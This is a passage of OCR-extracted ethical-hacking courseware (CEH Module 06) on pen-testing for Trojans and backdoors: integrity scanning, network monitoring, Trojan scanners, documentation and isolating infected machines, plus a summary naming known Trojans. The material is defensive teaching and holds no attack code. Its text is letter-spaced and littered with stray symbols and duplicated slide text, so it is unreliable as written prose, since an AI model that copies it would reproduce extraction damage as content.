T h e easy w a y f o r an a t t a c k e r t o h a c k a s y s te m is w i t h t h e use o f file s e m b e d d e d w i t h T r o ja n p a cka ge s. F ire w a lls , IDSes, a nd o t h e r s e c u r it y m e c h a n is m s m a y fa il t o p r e v e n t t h is k in d o f a tta c k . T h e r e f o r e , y o u n e e d t o scan all file s a n d f o l d e r s f o r T r o j a n s a n d b a c k d o o r s . You can scan file s a n d f o l d e r s u sin g t o o l s such as FCIV, TRIPWIRE, SIGVERIF, F astSum , a n d W i n M D 5 .

Step 8: Scan for network activities
N e t w o r k a c tiv it ie s such as u p lo a d o f b u l k fi l e s o r u n u s u a lly h ig h t r a f f i c g o in g t o a p a r t i c u l a r w e b a d d re s s m a y s o m e t i m e s r e p r e s e n t a sign o f T r o ja n . You s h o u ld scan f o r such n e t w o r k a c t i v it ie s . T o o ls such as Capsa N e t w o r k A n a ly z e r can be used f o r t h is p u r p o s e .

M odule 06 Page 1002

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Step 9: Scan for modification to OS files
C he ck t h e c r itic a l OS file m o d ific a tio n o r m a n ip u la tio n u sin g t o o l s such as TR IP W IR E o r

m a n u a l ly c o m p a r e hash v a lu e s if y o u h a v e a b a c k u p c o p y .

Step 10: Run Trojan Scanner to detect Trojans
T r o ja n s c a n n e rs such as T r o j a n H u n t e r a n d E m s is o f t A n t i - M a l w a r e a re r e a d ily a v a ila b le in t h e m a r k e t . You can in s ta ll a n d ru n t h o s e T r o ja n s c a n n e rs t o d e t e c t T ro ja n s o n y o u r s y s te m .

M odule 06 Page 1003

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Pen Testing for Trojans and Backdoors (C o n t’d)
I f T r o ja n s D o c u m e n t a ll t h e f in d in g s ••> a re d e te c te d ? NO A . 0

CEH

D o c u m e n t a ll y o u r fin d in g s in p re v io u s steps; it h e lp s in d e te rm in in g th e n e x t a c tio n if T roja ns a re id e n tifie d in th e system

YES Is o la te t h e m a c h in e fro m n e tw o rk

0

Is o la te in fe c te d s y s te m fro m th e n e tw o rk im m e d ia te ly to p re v e n t f u r t h e r in fe c tio n

9

S a n itiz e t h e c o m p le te s y s te m fo r T roja ns u sing an u p d a te d a n ti-v iru s

s o lu tio n t o c le a n T ro ja n s

Copyright © by

EG-G*ancil. All

Rights Reserved. Reproduction Is Strictly Prohibited.

P e n T e s t i n g f o r T r o j a n s a n d B a c k d o o r s ( C o n t ’d)
Step 11: Document all the findings
O n c e y o u c o n d u c t all p o s s ib le te s ts t o f i n d t h e T r o ja n s , d o c u m e n t all t h e fi n d i n g s t h a t y o u o b t a i n a t e ach t e s t f o r a n a ly s is a n d c h e c k if t h e r e is a n y sign o f a T r o ja n .

Step 12: Isolate the machine from the network
W h e n y o u fin d a T r o j a n o n a m a c h in e , y o u s h o u ld is o la te t h e m a c h in e i m m e d i a t e l y f r o m t h e n e t w o r k b e f o r e it ta k e s c o n t r o l o v e r o t h e r s y s te m s in t h e n e t w o r k . C he ck w h e t h e r t h e a n t iv ir u s s o f t w a r e is u p d a t e d o r n o t. If t h e a n t i v i r u s is n o t u p d a t e d , t h e n u p d a t e it a n d t h e n r u n i t t o scan t h e s y s te m . If t h e a n t iv ir u s is a lr e a d y u p d a t e d , t h e n f i n d o t h e r a n t i v i r u s s o lu t i o n s t o c le a n T r o ja n s .

M odule 06 Page 1004

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

M odule Su m m ary

C EH

‫ב‬

Trojans are malicious pieces of code that carry cracker software to a target system

□ □

They are used primarily to gain and retain access on the target system They often reside deep in the system and make registry changes that allow them to meet their purpose as a remote administration tool

□ □ □

Popular Trojans include MoSucker, Rem oteByM ail, Illusion Bot, and Zeus Awareness and preventive measures are the best defences against Trojans Using anti-Trojan tools such as TrojanHunter and Emsisoft Anti-Malware to detect and eliminate Trojans

Copyright © by

EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le S u m m a ry
9 © 9 T ro ja n s a re m a lic io u s p ie c e s o f c o d e t h a t c a r r y c r a c k e r s o f t w a r e t o a t a r g e t s y s te m . T h e y a re used p r i m a r i l y t o g ain a n d r e ta in access o n t h e t a r g e t s y s te m . T h e y o f t e n re s id e d e e p in t h e s y s te m a n d m a k e r e g is t r y c h a n g e s t h a t a l l o w t h e m t o m e e t t h e i r p u r p o s e as a r e m o t e a d m i n i s t r a t i o n t o o l . 0 0 9 P o p u la r T r o ja n s in c lu d e M o S u c k e r , R e m o t e B y M a i l, Illu s io n Bo t, a nd Zeus. A w a r e n e s s a n d p r e v e n t i v e m e a s u r e s a re t h e b e s t d e fe n c e s a g a in s t T ro ja n s . U sing a n t i - T r o ja n t o o l s such as T r o j a n H u n t e r a n d E m s is o ft A n t i - M a l w a r e t o d e t e c t a nd e l i m i n a t e T ro ja n s .

M odule 06 Page 1005

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.